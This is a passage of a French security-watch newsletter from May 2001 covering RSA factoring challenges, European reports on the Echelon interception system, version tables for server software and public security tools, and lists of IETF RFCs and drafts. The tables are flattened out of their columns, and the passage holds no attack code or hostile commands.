de travail en durée mais 35,7 années équivalentes de puissance de calcul distribuée Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 12/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 sur 160 SUN 175/400Mhz, 8 SGI 200Mhz, 120 PII 300/400Mhz, 4 Digital 500Mhz. Quelques chiffres clefs concernant les principaux défis sont rappelés dans le tableau suivant: Défi Date Taille Durée Années CPU Coût matériel (MF) Prix ($) Origine RSA-100 1991 NA NA NA NA 1 000 RSA Security RSA-110 1992 NA NA NA NA 4 429 RSA Security RSA-120 1993 NA NA NA NA 5 898 RSA Security RSA-129 1977 426 bits 32 sem. NA NA 100 RSA Security RSA-130 1991 428 bits NA NA 14 527 RSA Security RSA-140 1999 465 bits 9 sem. 8,9 6 (estimation) 17 226 RSA Security RSA-155 1999 512 bits 30 sem. 35,7 10 (estimation) 9 383 RSA Security En l’état actuel, il est difficile d’estimer les puissances de calcul nécessaires pour vaincre les nouveaux défis mais il est fort probable que seuls les défis RSA-576 et RSA-640 puissent être remportés dans l’état actuel des connaissances et de la technologie. Un article publié en 1999 par la société RSA Security a propos de Twinkle, le système de factorisation utilisant une technologie optique imaginé par A.Shamir, précisait qu’il faudrait environ 6000 mois pour factoriser un nombre de 768 bits à l’aide d’une machine comportant 1200 nœuds … # Complément d'information http://www.rsasecurity.com/rsalabs/challenges/factoring/index.html LA LEGISLATION SURVEILLANCE ECHELON # Description Duncan Campbell est l’auteur du rapport ‘Interception Capabilities 2000’, l’une des 5 études de l’enquête dénommée ‘Development of surveillance technology and risk of abuse of economic information’. La publication en Octobre 1999 de cette enquête commanditée par le comité scientifique du Parlement Européen - le STOA - est à l’origine de la divulgation de l’existence du système d’interception Echelon. Dans un article intitulé «Echelon system identified as ‘legislation-free zone’ » publié le 27 Mai par le magazine en ligne Allemand Telepolis, Duncan Campbell retrace l’historique des différentes études pilotées par l’Europe et l’impact de celles-ci sur les échanges avec les Etats-Unis. Si l’on se réfère à cet article, le comité chargé du dossier Echelon à la Commission Européenne devrait publier un rapport mettant en demeure les gouvernements Anglais et Allemands de respecter les règles édictées par le Convention Européenne des Droits de l’Homme: « The draft committee report concludes that "there would seem to be good reason ... to call on Germany and the United Kingdom to take their obligations under the ECHR seriously and to make the authorisation of further intelligence activities by the NSA on their territory contingent on compliance with the ECHR" ». Il est ainsi reproché à ces deux gouvernement d’être dans l’incapacité d’éviter une utilisation abusive des stations d’écoute étrangères présentes sur leur territoire mettant ainsi en danger la liberté des citoyens et bafouant les lois communautaires. Notons par ailleurs l’existence de quatre nouvelles études commissionnées en 2001 par le Parlement Européen mais non référencées dans la liste des rapports publiés par le STOA. Ces documents, dont trois sont accessibles sur le site de Telepolis, ont pour objectif d’affiner les résultats des premiers rapports en s’intéressant plus particulièrement à l’impact économique : 1. Echelon and its role in COMINT (COMmunication INTelligency) : ce document, édité en Janvier 2001, propose un état de l’art tenant compte des nouvelles informations diffusées ou acquises depuis la publication du rapport ‘Interception Capabilities 2000’ initié en 1998 et publié fin 1999. Il a pour intérêt de mettre en évidence la part de la rumeur et des informations non confirmées dans la couverture du dossier Echelon par les médias. 2. COMINT Impact on international trade : Lui aussi édité en Janvier 2001, ce rapport propose une liste détaillée des affaires de commerce international qui auraient pu bénéficier des services d’un service d’analyse des communications et ce depuis 1992. Toutes les sources d’information permettant de corroborer les faits sont détaillées. Quatre documents fac-similés détaillant la stratégie du gouvernement américain – Levelling the playing field around the world - sont joints en annexe. 3. COMINT privacy and human rights : Cette étude vise à démontrer, documents à l’appui, que les formes d’interception autorisées par le gouvernement Anglais et visant à protéger les droits des citoyens Américains, Canadiens et Australiens sont en contradiction avec les lois territoriales anglaises. Ce document a amené le Comité Européen à constater que les atteintes potentielles à la liberté et au commerce posé par un système de type Echelon proviennent non seulement du fait qu’il s’agit d’un système d’interception extrêmement puissant mais aussi qu’il opère depuis une vaste zone non soumise à la législation («possible threats to privacy and to businesses posed by a system of the ECHELON type arise not only from the fact that is a particularly powerful monitoring system, but also that it operates in a largely legislation-free area»). # Complément d’information http://www.heise.de/tp/english/special/ech/7753/1.html Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Page 13/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 LO OG GIIC BR RE CIIE ES S EL LS S LIIB LES SERVICES DE BASE Les dernières versions des services de base sont rappelées dans les tableaux suivants. Nous conseillons d’assurer rapidement la mise à jour de ces versions, après qualification préalable sur une plate-forme dédiée. RESEAU Nom $ BIND $ DHCP NTP4 WU-FTP Fonction Ver. Gestion de Nom (DNS) Serveur d'adresse Serveur de temps Serveur de fichiers 9.1.2 3.0rc7 4.0.99k23 2.6.1 Date Source 04/05/01 17/05/01 11/04/01 02/07/00 http://www.isc.org/products/BIND http://www.isc.org/products/DHCP/dhcp-v3.html http://www.eecis.udel.edu/~ntp http://www.wu-ftpd.org MESSAGERIE Nom IMAP4 POP3 $ SENDMAIL Fonction Ver. Relevé courrier Relevé courrier Serveur de courrier 2000c 4.0 8.12.0b10 8.11.4 Fonction Ver. Date Source 20/02/01 http://www.washington.edu/imap/documentation/RELNOTES.html 25/04/01 http://www.eudora.com/qpopper_general/ 24/05/01 http://www.sendmail.org 24/05/01 WEB Nom $ APACHE $ ModSSL $ MySQL SQUID 1.3.20 2.0.16b API SSL Apache 1.3.20 2.8.4 Base SQL 3.23.38 Cache WEB 2.4s1 Serveur WEB Date Source 15/05/01 04/04/01 15/05/01 27/05/01 20/03/01 http://httpd.apache.org/dist http://www.modssl.org/ http://www.mysql.com/downloads/index.html http://www.squid-cache.org AUTRE Nom $ INN MAJORDOMO OpenCA $ OpenLDAP LES Fonction Ver. Gestion Gestion Gestion Gestion 2.3.2 1.94.5 0.2.0-5 2.0.11 des news des listes de certificats de l'annuaire Date Source 03/05/01 15/01/00 26/01/01 24/05/01 http://www.isc.org/products/INN http://www.greatcircle.com/majordomo http://www.openca.org http://www.openldap.org OUTILS Une liste, non exhaustive, des produits et logiciels de sécurité du domaine public est proposée dans les tableaux suivants. LANGAGES Nom $ Perl $ PHP Fonction Ver. Scripting WEB Dynamique 5.6.1 4.0.5 Date Source 23/04/00 http://www.cpan.org/src/index.html 30/04/01 http://www.php.net ANALYSE RESEAU Nom $ Big Brother Dsniff $ Ethereal IP Traf Nstreams SamSpade TcpDump WinPCap Fonction Ver. Visualisateur snmp Boite à outils Analyse multiprotocole Statistiques IP Générateur de règles Boite à outils Analyse multiprotocole Acquisition Trame 1.8a 2.3 0.8.18 2.4.0 1.0.0 1.14 3.6.2 2.10 Date Source 21/05/01 17/12/00 17/05/01 20/03/01 11/11/00 10/12/99 05/02/01 26/03/01 http://maclawran.ca/bb-dnld/new-dnld.html http://www.monkey.org/~dugsong/dsniff http://www.ethereal.com http://cebu.mozcom.com/riker/iptraf/ http://www.hsc.fr/ressources/outils/nstreams/download/ http://www.samspade.org/ssw/ http://www.tcpdump.org/ http://netgroup-serv.polito.it/winpcap ANALYSE DE JOURNAUX Nom Fonction Ver. Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés Date Source Page 14/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 $ Analog Autobuse $ SnortSnarf WebAlizer Journaux serveur http Analyse syslog Analyse Snort Journaux serveur http 5.01 1.13 052301 2.01-06 10/05/01 31/01/00 23/05/01 17/10/00 http://www.analog.cx http://www.picante.com/~gtaylor/autobuse http://www.silicondefense.com/software/snortsnarf/ http://www.mrunix.net/webalizer/ ANALYSE DE SECURITE Fonction Ver. $ curl $ Nessus Nmap Nom Analyse http et https Vulnérabilité réseau Vulnérabilité réseau Pandora $ Saint $ Sara Tara (tiger) Tiger Trinux Vulnérabilité Netware Vulnérabilité réseau Vulnérabilité réseau Vulnérabilité système Vulnérabilité système Boite à outils 7.7.3 1.0.8 2.53 2.54B22 4.0b2.1 3.2.4 3.4.3 2.0.9 2.2.4p1 0.8pre1 Date Source 07/05/01 24/05/01 05/09/00 10/03/01 12/02/99 16/05/01 17/03/01 07/09/99 19/07/99 22/10/00 http://curl.haxx.se/ http://www.nessus.org http://www.insecure.org/nmap http://www.packetfactory.net/projects/pandora/ http://www.wwdsi.com/saint http://www-arc.com/sara http://www-arc.com/tara ftp://net.tamu.edu/pub/security/TAMU/tiger http://www.io.com/~mdfranz/trinux/boot-images/ CONFIDENTIALITE Nom OpenPGP $ GPG Fonction Signature/Chiffrement Signature/Chiffrement Ver. 1.0.6 Date Source http://www.openpgp.org/ 29/05/01 http://www.gnupg.org CONTROLE D'ACCES Nom Fonction Ver. TCP Wrapper Xinetd Accès services TCP Inetd amélioré 7.6 2.1.89p15 Date Source ftp://ftp.cert.org/pub/tools/tcp_wrappers 20/05/01 http://www.xinetd.org CONTROLE D'INTEGRITE Nom Fonction Ver. Tripwire Intégrité LINUX 2.3.47 Date Source 15/08/00 http://www.tripwire.org/downloads/index.php DETECTION D'INTRUSION Nom Fonction Deception TK Pot de miel Snort IDS Système Shadow IDS Réseau Ver. 19990818 1.7 1.6 Date Source 18/08/99 http://all.net/dtk/dtk.html 05/01/01 http://www.snort.org 01/07/00 http://www.nswc.navy.mil/ISSEC/CID/ GENERATEURS DE TEST Nom Fonction Ver. Requêtes HTTP Analyse filtres Paquets IP Détection d'intrusion Sessions TCP Paquets UDP Requêtes HTTP 1.4.5 1.0 2.1a 1.0 1.0.1 1.2 1.4 Pre2 Nom Fonction Ver. DrawBridge IpFilter Cooker Sinus PareFeu FreeBsd Filtre datagramme PareFeu Linux PareFeu Linux 3.1 3.4.17 Experim. 0.1.6 Elza FireWalk IPSend IDSWakeUp TcpReplay UdpProbe $ Whisker Date Source 01/04/00 03/02/01 19/09/97 13/10/00 19/05/97 13/02/96 24/12/99 24/05/01 http://www.stoev.org/elza/project-news.html http://www.packetfactory.net/firewalk ftp://coombs.anu.edu.au/pub/net/misc http://www.hsc.fr/ressources/outils/idswakeup/download/ http://www.anzen.com/research/nidsbench/ http://sites.inka.de/sites/bigred/sw/udpprobe.txt http://www.wiretrip.net/rfp/p/doc.asp?id=21 http://www.wiretrip.net/rfp/p/doc.asp?id=21 PARE-FEUX Date Source 19/04/00 07/04/01 26/02/01 01/09/00 http://drawbridge.tamu.edu http://coombs.anu.edu.au/ipfilter/ip-filter.html http://www.linux-mandrake.com/fr/cookerdevel.php3 http://www.ifi.unizh.ch/ikm/SINUS/firewall TUNNELS Fonction Ver. Date Source $ CIPE FreeSwan http-tunnel Nom Pile Crypto IP (CIPE) Pile IPSec Encapsulation http Pile SSL Pile SSH 1 et 2 Pile SSH 1 autorisée Proxy https PlugIn SSH TeraTerm Tunnel TCP/UDP 01/05/01 27/03/01 06/12/00 08/03/01 05/04/01 19/03/01 16/09/99 22/02/01 21/03/01 09/02/01 http://sites.inka.de/sites/bigred/devel/cipe.html http://www.freeswan.org http://www.nocrew.org/software/httptunnel.html OpenSSL $ OpenSSH SSF Stunnel TTSSH Zebedee 1.5.2 1.9 3.0.5 3.3 (dev) 0.9.6a 2.9 1.2.27.6 3.14 1.54 2.2.1 Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés http://www.openssl.org/ http://www.openssh.com/ http://info.in2p3.fr/secur/ssf http://www.stunnel.org http://www.zip.com.au/~roca/ttssh.html http://www.winton.org.uk/zebedee/ Page 15/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 NO OR TA RM AN ME ND ES DA SE AR RD ET DS T ST S LES LES PUBLICATIONS DE L'IETF RFC Du 21/04/2001 au 23/05/2001, 10 RFC ont été publiés dont 3 RFC ayant trait à la sécurité. RFC TRAITANT DE LA SÉCURITÉ Thème DNS RSVP SOCKS Num Date Etat Titre 3110 3097 3089 05/01 Pst 04/01 Pst 04/01 Inf RSA/SHA-1 SIGs and RSA KEYs in the Domain Name System (DNS) RSVP Cryptographic Authentication -- Updated Message Type Value A SOCKS-based IPv6/IPv4 Gateway Mechanism RFC TRAITANT DE DOMAINES CONNEXES À LA SÉCURITÉ Thème Num Date Etat Titre SMTP 2821 04/01 Pst Simple Mail Transfer Protocol AUTRES RFC Thème BGP IETF IETF IMF RSVP SLP LES Num Date Etat Titre 3107 2800 2899 2822 2961 3111 05/01 05/01 05/01 04/01 04/01 05/01 Pst STD Inf Pst Pst Pst Carrying Label Information in BGP-4 Internet Official Protocol Standards Request for Comments Summary RFC Numbers 2800-2899 Internet Message Format RSVP Refresh Overhead Reduction Extensions Service Location Protocol Modifications for IPv6 DRAFTS Du 21/04/2001au 23/05/2001, 171 drafts ont été publiés: 116 drafts mis à jour, 55 nouveaux drafts, dont 7 drafts ayant directement trait à la sécurité. NOUVEAUX DRAFTS TRAITANT DE LA SECURITE Thème Nom du Draft Date Titre DPD OSPF OSPF PAGING PPP SSH RSVP draft-huang-dpd-00 draft-etienne-ospfv2-auth-flaws-00 draft-etienne-rfc2154-flaws-00 draft-mutaf-paging-security-requirements-00 draft-arkko-pppext-eap-aka-00 draft-ietf-secsh-dns-key-format-00 draft-ietf-rap-rsvp-authsession-00 09/05 09/05 04/05 07/05 17/05 10/05 30/04 A Traffic-Based Method of Detecting Dead IKE Peers Flaws in packet's authentication of OSPFv2 OSPF with digital signature against an insider IP Paging Security Requirements EAP AKA Authentication Storing SSH Host Keys in DNS Session Authorization for RSVP MISE A JOUR DE DRAFTS TRAITANT DE LA SECURITE Thème Nom du Draft Date Titre AAA DIAMETER DNS IPCDN IPSEC MAP MOBILEIP SIP SIP SMIME draft-ietf-aaa-transport-02 draft-ietf-aaa-diameter-e2e-sec-02 draft-ietf-dnsext-parent-stores-zone-keys-01 draft-ietf-ipcdn-bpiplus-mib-05 draft-ietf-ipsec-dhcp-12 draft-arkko-map-doi-02 draft-ietf-mobileip-aaa-key-05 draft-calhoun-sip-aaa-reqs-02 draft-ietf-sip-privacy-02 draft-ietf-smime-compression-04 draft-ietf-smime-rcek-03 draft-ietf-smime-seclabel-04 draft-ietf-smime-ecc-06 18/05 15/05 09/05 10/05 14/05 21/05 17/05 08/05 21/05 10/05 11/05 08/05 15/05 Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés AAA Transport Issues Diameter End-2-End Security Extension Parent stores the child's zone KEYs Management Information Base for DOCSIS Cable Modems … DHCPv4 Configuration of IPSEC Tunnel Mode The MAP Security Domain of Interpretation for ISAKMP AAA Registration Keys for Mobile IP AAA Requirements for IP Telephony/Multimedia SIP Extensions for Caller Identity and Privacy Compressed Data Content Type for S/MIME Reuse of CMS Content Encryption Keys Implementing Company Classif. Policy with the S/MIME Sec. Label Use of ECC Algorithms in CMS Page 16/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 DRAFTS TRAITANT DE DOMAINES CONNEXES A LA SECURITE Thème Nom du Draft AAA draft-ietf-aaa-diameter-04 draft-ietf-aaa-diameter-mobileip-04 draft-ietf-aaa-diameter-nasreq-04 BGP draft-ouldbrahim-bgpgmpls-ovpn-00 ATM draft-ietf-bmwg-atm-term-abr-03 FRMRELAY draft-ietf-bmwg-fr-term-06 DIAMETER draft-calhoun-diameter-sun-ping-02 ETHERIP draft-housley-etherip-02 LDAP draft-greenblatt-dn-type-00 draft-ietf-ldapbis-filter-01 draft-ietf-ldapbis-url-01 draft-ietf-ldapext-ldap-java-api-14 draft-legg-ldapext-component-matching-01 draft-zeilenga-ldap-collective-00 draft-zeilenga-ldap-user-schema-00 draft-zeilenga-ldap-x500-locate-00 LDUP draft-ietf-ldup-lcup-00 ISATAP draft-ietf-ngtrans-isatap-01 PILC draft-ietf-pilc-pep-07 POLICY draft-ietf-policy-core-schema-11 draft-ietf-policy-qos-info-model-03 SPPI draft-ietf-rap-signaled-priority-v2-01 draft-ietf-rap-sppi-07 SYSLOG draft-ietf-syslog-reliable-08 draft-ietf-syslog-syslog-10 ECML draft-ietf-trade-ecml2-req-02 VPN draft-tsenevir-l2-req-00 L2TP draft-vipin-l2tpext-failover-00 Date Titre 15/05 15/05 15/05 24/04 25/04 25/04 07/05 24/04 03/05 08/05 11/05 04/05 07/05 26/04 26/04 26/04 11/05 21/05 04/05 04/05 25/04 22/05 10/05 17/05 22/05 08/05 15/05 04/05 Diameter Base Protocol Diameter Mobile IP Extensions Diameter NASREQ Extensions BGP/GMPLS Optical VPNs Terminology for ATM ABR Benchmarking Terminology for Frame Relay Benchmarking Diameter Sun Ping Extensions EtherIP: Tunneling Ethernet Frames in IP Datagrams Control for requesting DN object class in LDAP The String Representation of LDAP Search Filters The LDAP URL Format The Java LDAP Application Program Interface LDAP & X.500 Component Matching Rules LDAPv3: Collective Attributes LDAPv3: A Collection of User Schema Location of LDAP services using Geo-Political Naming LDAP Client Update Protocol Intra-Site Automatic Tunnel Addressing Protocol (ISATAP) Perf. Enhan. Proxies Intended to Mitigate Link-Relat. Degradations Policy Framework LDAP Core Schema Policy Framework QoS Information Model Signaled Preemption Priority Policy Element Structure of Policy Provisioning Information (SPPI) Reliable Delivery for Syslog Syslog Protocol ECML:Version 2 Requirements Requirements for Network Based Layer 2 VPN Fail over extensions for L2TP AUTRES DRAFTS Thème Nom du Draft Date Titre 3GPP2 3GPP2 ACE AHO APEX draft-bradner-3gpp2-collaboration-01 07/05 3GPP2-IETF Standardization Collaboration ATMAAL2 BASE BGP BTC CDN CONTENT DATA DATE DHCP DIFFSER DNS DVMRP ECM FAX draft-jonsson-3gpp2-rohc-rtp-0-byte-requirements-02 01/05 3GPP2 Requirements for 0-byte ROHC IP/UDP/RTP Header Comp. draft-ietf-idn-dunce-00 draft-korkea-aho-spatial-location-payload-00 draft-etal-apex-party-01 draft-ietf-apex-access-01 draft-ietf-apex-core-01 draft-ietf-apex-presence-01 draft-new-apex-server-00 draft-ashoka-atmaal2-mib-00 draft-josefsson-base-encoding-02 draft-chen-bgp-prefix-orf-02 draft-iab-bgparch-01 draft-ietf-idr-as4bytes-03 draft-xu-bgp-gmpls-00 draft-ietf-ippm-btc-framework-06 draft-cain-cdnp-known-request-routing-02 draft-alvestrand-content-language-01 draft-korkea-aho-spatial-dataset-01 draft-ietf-impp-datetime-02 draft-ietf-dhc-dhcpv6-18 draft-ietf-diffserv-2836bis-02 draft-ietf-diffserv-efresolve-01 draft-iab-arpa-02 draft-ietf-dnsop-hardie-shared-root-server-05 draft-ietf-idn-iptr-02 draft-ietf-idn-requirements-07 draft-skwan-utf8-dns-06 draft-ietf-idmr-dvmrp-v3-10 draft-ietf-idmr-dvmrp-v3-as-00 draft-ietf-ecm-cm-04 draft-ietf-trade-voucher-lang-01 draft-ietf-fax-gateway-options-02 draft-ietf-fax-gateway-protocol-04 draft-maeda-faxwg-terminal-mode-goals-01 draft-maeda-faxwg-terminal-mode-protocol-01 FC draft-ietf-ips-fcencapsulation-01 draft-anil-fcip-mib-00 FRMRELAY draft-ietf-frnetmib-frmrelay-service-04 draft-ietf-frnetmib-frsi-02 Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés 24/04 21/05 16/05 07/05 07/05 07/05 10/05 08/05 04/05 26/04 09/05 09/05 23/05 26/04 14/05 24/04 21/05 15/05 25/04 09/05 26/04 21/05 26/04 17/05 23/05 08/05 17/05 17/05 14/05 17/05 22/05 22/05 08/05 08/05 08/05 26/04 01/05 01/05 A prop. for a Definitely Unencumbered New Comp [ACE] Encoding Spatial Location Payload The APEX Option Party Pack, Part Deux! The APEX Access Service The Application Exchange Core The APEX Presence Service APEX Endpoint Servers Definitions of Managed Objects for ATM Adaptation Layer 2 Base Encodings Address Prefix Based Outbound Route Filter for BGP-4 Architectural Requir. for Inter-Domain Routing in the Internet BGP support for four-octet AS number space A BGP/GMPLS Solution for Inter-Domain Optical Networking A Framework for Defining Empirical Bulk Transfer Capacity Metrics Known CDN Request-Routing Mechanisms Content Language Headers A Common Spatial Location Dataset Date and Time on the Internet: Timestamps Dynamic Host Configuration Protocol for IPv6 (DHCPv6) Per Hop Behavior Identification Codes A Delay Bound alternative revision of RFC2598 Management Guidelines & Operational Requir. for ('ARPA') Distributing Authorittative Name Servers via Shared Unicast Addr. Internationalized PTR Resource Record (IPTR) Requirements of Internationalized Domain Names Using the UTF-8 Character Set in the Domain Name System Distance Vector Multicast Routing Protocol Distance Vector Multicast Routing Protocol Applicability Statement The Congestion Manager XML Voucher: Generic Voucher Language Guideline of optional services for Internet FAX Gateway Internet FAX Gateway Functions Goals for Terminal Mode Protocol for Terminal Mode FC Frame Encapsulation FCIP Management MIB Def. of Managed Objects for Frame Relay Service Level Definitions Def. of Managed Objects for Circuit to Interface Translation Page 17/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 FTP GFIBI GMPLS GRE IDRM IGMP IMAP IOTP IP IPNRG IPSEC IPV6 draft-ietf-ftpext-mlst-13 draft-massimo-gfibi-01 draft-ietf-ccamp-gmpls-sonet-sdh-00 draft-christian-gre-over-clnp-02 draft-irtf-idrm-handle-system-00 draft-irtf-idrm-handle-system-def-00 draft-irtf-idrm-handle-system-protocol-00 draft-ietf-idmr-igmp-mrdisc-06 draft-ietf-ngtrans-mtp-00 draft-nerenberg-imap-binary-04 draft-palme-mailext-headers-05 draft-ietf-trade-iotp-v1-errata-00 draft-draves-ipngwg-ingress-filtering-00 draft-ietf-pilc-error-07 draft-ietf-pilc-slow-06 draft-ietf-tewg-framework-04 draft-kashyap-ipoib-ipv4-and-arp-00 draft-kashyap-ipoib-ipv4-multicast-00 draft-wlai-tewg-measure-01 draft-pelissier-ipoib-encaparp-00 draft-irtf-ipnrg-arch-00 draft-etienne-ipsec-esp-ctr-mode-00 draft-blanchet-ipngwg-testadd-00 draft-thaler-ipngwg-multilink-subnets-00 draft-iesg-ipv6-addressing-recommendations-01 ISCSI IS-IS L2TP LANMAR LDAP LDUP LOCAL M3UA MAIL MBONE MBUS MEGACO MGCP MIB MIDCOM MIDTAX MIME MMUSIC MOBILE MOBILEIP MPLS draft-ietf-ipngwg-default-addr-select-04 draft-ietf-ipngwg-router-selection-00 draft-ietf-malloc-ipv6-guide-02 draft-lutchann-ipv6-intro-00 draft-sheinwald-iscsi-crc-00 draft-hermelin-ext-lsp-frags-01 draft-ietf-isis-wg-mib-04 draft-martin-isis-admin-tags-01 draft-ietf-l2tpext-ppp-discinfo-04 draft-ietf-l2tpext-svctype-01 draft-parikh-l2tpext-failover-00 draft-ietf-manet-lanmar-01 draft-ietf-ldapbis-dn-05 draft-ietf-ldapext-ldapudp-00 draft-ietf-ldup-urp-04 draft-proberts-local-subnet-mobility-problem-01 draft-sigtran-m3ua-mib-01 draft-palme-maillist-01 draft-ietf-mboned-iana-ipv4-mcast-guidelines-02 draft-ietf-mboned-glop-extensions-02 draft-ietf-mmusic-mbus-transport-05 draft-boyle-megaco-tonepkgs-04 draft-taylor-megaco-enhalpkgs-00 draft-andreasen-mgcp-rfc2705bis-01 draft-foster-mgcp-nas-01 draft-ietf-disman-alarm-mib-02 draft-ietf-entmib-impl-check-00 draft-ietf-midcom-framework-01 draft-ietf-midcom-scenarios-02 draft-shore-midcom-apps-00 draft-carpenter-midtax-01 draft-herriot-application-multiplexed-00 draft-fairlie-mmusic-sdp-sctp-00 draft-reynolds-mobile-isp-requirements-00 draft-ietf-mobileip-3gwireless-ext-06 draft-ietf-mobileip-fast-mipv6-01 draft-ietf-mobileip-gnaie-03 draft-ietf-mobileip-hmipv6-03 draft-ietf-mobileip-lowlatency-handoffs-v4-01 draft-bala-mplamps-01 draft-dubuc-mpls-bundle-mib-02 draft-ganti-mpls-diffserv-elsp-00 draft-harrison-mpls-oam-req-00 draft-ietf-mpls-diff-ext-09 draft-ietf-mpls-generalized-cr-ldp-03 draft-ietf-mpls-generalized-rsvp-te-03 draft-ietf-mpls-generalized-signaling-04 draft-ietf-mpls-lsp-query-02 draft-ietf-mpls-tc-mib-00 draft-martini-l2circuit-encap-mpls-02 draft-martini-l2circuit-trans-mpls-06 draft-nadeau-mpls-gmpls-te-mib-00 Veille Technologique Sécurité N°34 © APOGEE Communications - Tous droits réservés 21/05 08/05 11/05 14/05 10/05 10/05 10/05 08/05 18/05 23/05 21/05 18/05 21/05 07/05 04/05 27/04 03/05 30/04 17/05 08/05 18/05 15/05 07/05 21/05 16/05 14/05 21/05 27/04 18/05 08/05 09/05 27/04 18/05 01/05 04/05 09/05 21/05 30/04 11/05 10/05 08/05 23/05 21/05 02/05 27/04 11/05 14/05 25/04 11/05 25/04 30/04 01/05 16/05 21/05 11/05 30/04 01/05 10/05 17/05 17/05 26/04 04/05 27/04 16/05 08/05 22/05 27/04 21/05 27/04 02/05 02/05 02/05 15/05 14/05 22/05 22/05 30/04 Extensions to FTP Guidelines for Internet Bibliographic Issues GMPLS Extensions for SONET and SDH Control Generic Routing Encapsulation over CLNP networks Handle System Overview Handle System Namespace and Service Definition Handle System Protocol (ver 2.0) Specification IGMP Multicast Router Discovery An IPv6/IPv4 Multicast Translator based on IGMP/MLD Proxying IMAP4 Binary Content Extension Common Internet Message Header Fields Internet Open Trading Protocol (IOTP)Version 1 Errata Ingress Filtering, Site Multihoming, and Source Address Selection End-to-end Performance Implications of Links with Errors End-to-end Performance Implications of Slow Links A Framework for Internet Traffic Engineering IPv4 and ARP over InfiniBand networks IPv4 multicast and broadcast over InfiniBand networks A Framework for Internet Traffic Engineering Measurement IP and ARP over InfiniBand(TM) Architecture Interplanetary Internet (IPN): Architectural Definition The counter-mode and its use with ESP IPv6 Test Address Space Reserved for Doc. , Ex. and Priv Testing Multi-link Subnet Support in IPv6 IAB/IESG Recommendations on IPv6 Address Allocations Default Address Selection for IPv6 Default Router Preferences and More-Specific Routes Dynamic Allocation Guidelines for IPv6 Multicast Addresses A Technical Introduction to IPv6 Memo iSCSI CRC/Checksum Considerations Ext. the Number of IS-IS LSP Fragments Beyond the 256 Limit Management Information Base for IS-IS Administrative Tags in IS-IS L2TP Disconnect Cause Information L2TP Service Type Proposed mechanism for L2TP failover handling Landmark Routing Protocol for Large Scale Ad Hoc Networks LDAP v3 : UTF-8 String Representation of Distinguished Names Lightweight Directory Access Protocol over UDP/IP LDUP Update Reconciliation Procedures Local Subnet Mobility Problem Statement SS7 MTP3-User Adaptation Layer (M3UA) MIB using SMIv2 Appropriate Mailing List Behaviour IANA Guidelines for IPv4 Multicast Address Allocation Extended Allocations in 233/8 A Message Bus for Local Coordiantion Supplemental Tones Packages for Megaco/H.248 Megaco/H.248 Enhanced Analog Line Packages Media Gateway Control Protocol (MGCP) Version 1.0bis NAS packages for MGCP Alarm MIB Entity MIB Implementation Checklist Middlebox Communication Architecture and framework MIDCOM Scenarios Application Considerations for Midcom Middleboxes Middle boxes: taxonomy and issues The MIME Application/Multiplexed Content-type Guidelines for specifying SCTP-based media transport using SDP Mobile Internet Service Provider Reqts for a Wireless Internet F.. Mobile IP Based Micro Mobility Mgmt in The 3rd Gen. Wireless Net. Fast Handovers for Mobile IPv6 Generalized NAI (GNAIE) Extension Hierarchical MIPv6 mobility management Low latency Handoffs in Mobile IPv4 MPLampS: Electricity over IP (with an MPLS control plane) Link Bundling Management Information Base Using SMIv2 MPLS Support of Differentiated Services using E-LSP Requirements for OAM in MPLS Networks MPLS Support of Differentiated Services Generalized MPLS Signaling - CR-LDP Extensions Generalized MPLS Signaling - RSVP-TE Extensions Generalized MPLS - Signaling Functional Description MPLS LDP Query Message Description Def. of Textual Conv. and OBJECT-IDENTITIES for MPLS mgmt Encap. Methods for Transport of Layer 2 Frames Over MPLS Transport of Layer 2 Frames Over MPLS Extensions to the MPLS Traffic Engineering MIB in Support of … Page 18/45 Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE Mai 2001 MSDP MSLP NNI OGG OPTICAL OSPF PIM PKIX POLICY PPP PPVPN PRINT PROVREG PWE3 QTP RAP RFC1858 RIP RMD ROHC RSP RSVP RTP SCTP SDP SDP4NAT SEAMOBY draft-osu-ipo-mpls-issues-02 draft-tommasi-mpls-intserv-01 draft-ietf-msdp-spec-10 draft-zhao-slp-da-interaction-10 draft-young-opt-nni-prot-issues-00 draft-walleij-ogg-mediatype-00 draft-pbh-packet-optical-escalation-01 draft-giacalone-metric-auto-decay-routing-01 draft-ietf-ospf-5to7-00 draft-ydlin-pim-sm-rp-00 draft-ietf-pkix-cmp-transport-protocols-04 draft-ietf-policy-qos-device-info-model-03 draft-ietf-policy-terminology-03 draft-tsenevir-ppp-flow-00 draft-rosen-ppvpn-l2vpn-00 draft-ietf-printmib-finishing-10 draft-ietf-provreg-dn-defn-01 draft-ietf-provreg-grrp-reqs-02 draft-ietf-pwe3-requirements-00 draft-koleyni-pwe3-atm-over-mpls-00 draft-pate-pwe3-framework-00 draft-cornish-qtp-02 draft-ietf-rap-rsvp-newidentity-02 draft-ietf-rap-session-auth-00 draft-miller-rfc1858-cmts-00 draft-ietf-rip-mib-01 draft-westberg-rmd-framework-00 draft-westberg-rmd-od-phr-00 draft-ietf-rohc-rtp-0-byte-requirements-00 draft-pelletier-rohc-rtp-llarohc-cdma2000-00 draft-ietf-rserpool-comp-00 draft-ietf-rserpool-reqts-03 draft-ietf-issll-rsvp-cap-03 draft-gentric-avt-mpeg4-multisl-04 draft-harrison-avt-rtpkeys-00 draft-ietf-avt-evrc-03 draft-ietf-avt-rtp-amr-08 draft-ietf-avt-rtp-interop-08 draft-ietf-avt-rtptest-05 draft-ietf-avt-ulp-01 draft-ietf-tsvwg-addip-sctp-00 draft-ietf-tsvwg-rfc2960-bis-00 draft-otis-record-delivery-01 draft-ietf-mmusic-sdp-new-02 draft-ietf-mmusic-sdpng-00 